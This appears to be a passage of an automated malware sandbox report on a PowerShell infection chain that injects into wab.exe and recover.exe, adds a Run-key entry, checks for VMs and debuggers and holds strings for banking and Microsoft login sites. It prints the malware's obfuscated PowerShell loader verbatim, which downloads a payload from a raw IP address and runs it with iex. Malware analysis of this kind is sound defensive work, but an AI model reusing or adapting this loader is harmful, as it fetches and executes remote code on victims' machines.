DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). 
');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B78FB push ebx; retf 2_2_00007FFD348B796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B7958 push ebx; retf 2_2_00007FFD348B796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B00BD pushad ; iretd 2_2_00007FFD348B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD349871C8 push esp; retf 2_2_00007FFD349871C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_074B08D8 push eax; mov dword ptr [esp], ecx 5_2_074B0AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA09AD push ecx; mov dword ptr [esp], ecx 10_2_1FDA09B6
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034709AD push ecx; mov dword ptr [esp], ecx 13_2_034709B6
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D04220 push ds; iretd 13_2_02D04248
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D09028 push cs; iretd 13_2_02D0902A
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0A68E push edx; iretd 13_2_02D0A6BC
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CFE655 push cs; retf 13_2_02CFE68F
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CFE660 push cs; retf 13_2_02CFE68F
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CF778D push ds; iretd 13_2_02CF778F
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0F58B pushfd ; ret 13_2_02D0F58C
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0CE5F push ds; retf 13_2_02D0CE69
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CF3F9E push ecx; retf 13_2_02CF3FA9
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D09C45 push cs; retf 13_2_02D09C4F
Source: C:\Windows\SysWOW64\recover.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run T61TH2R0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\recover.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDFE20 rdtsc 10_2_1FDDFE20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5773
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4049
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7995
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1795
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.4 %
Source: C:\Windows\SysWOW64\recover.exe API coverage: 3.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep count: 7995 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3420 Thread sleep count: 1795 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2644 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\recover.exe TID: 4776 Thread sleep count: 57 > 30
Source: C:\Windows\SysWOW64\recover.exe TID: 4776 Thread sleep time: -114000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\recover.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0B6B0 FindFirstFileW,FindNextFileW,FindClose, 13_2_02D0B6B0
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 424iy8O9X8.13.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 424iy8O9X8.13.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 424iy8O9X8.13.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@@5
Source: 424iy8O9X8.13.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: wab.exe, 00000011.00000002.2856546297.00000000031E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wab.exe, 0000000A.00000003.2492749809.000000000434D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2619611582.000000000434D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2492965729.000000000434D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 424iy8O9X8.13.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 424iy8O9X8.13.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: powershell.exe, 00000002.00000002.2652707419.00000243354FD000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358949019.000000000123F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 424iy8O9X8.13.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 424iy8O9X8.13.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 424iy8O9X8.13.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: wab.exe, 0000000F.00000002.2771870139.00000000031B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 424iy8O9X8.13.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 424iy8O9X8.13.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 424iy8O9X8.13.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 424iy8O9X8.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 424iy8O9X8.13.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 424iy8O9X8.13.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 424iy8O9X8.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: firefox.exe, 00000012.00000002.3264539600.00000271040CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllllQ
Source: 424iy8O9X8.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\recover.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDFE20 rdtsc 10_2_1FDDFE20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_029ED8B8 LdrInitializeThunk,LdrInitializeThunk, 5_2_029ED8B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5CC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5CC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h] 10_2_1FE41CF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h] 10_2_1FE41CF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h] 10_2_1FE41CF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h] 10_2_1FE23CDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h] 10_2_1FE23CDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h] 10_2_1FE23CDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h] 10_2_1FE4FCDF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h] 10_2_1FE4FCDF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h] 10_2_1FE4FCDF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CCA0 mov ecx, dword ptr fs:[00000030h] 10_2_1FE1CCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD98C8D mov eax, dword ptr fs:[00000030h] 10_2_1FD98C8D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3C84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3C84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3C84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3C84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC8CB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDC8CB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC8CB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDC8CB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9DCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FD9DCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov ecx, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBCA0 mov ecx, dword ptr fs:[00000030h] 10_2_1FDDBCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD4C59 mov eax, dword ptr fs:[00000030h] 10_2_1FDD4C59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6C50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6C50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6C50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h] 10_2_1FD97C40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97C40 mov ecx, dword ptr fs:[00000030h] 10_2_1FD97C40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h] 10_2_1FD97C40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h] 10_2_1FD97C40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD1C7C mov eax, dword ptr fs:[00000030h] 10_2_1FDD1C7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FC4F mov eax, dword ptr fs:[00000030h] 10_2_1FE5FC4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1C60 mov eax, dword ptr fs:[00000030h] 10_2_1FDB1C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h] 10_2_1FE6DC27
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h] 10_2_1FE6DC27
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h] 10_2_1FE6DC27
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE29C32 mov eax, dword ptr fs:[00000030h] 10_2_1FE29C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB0C00
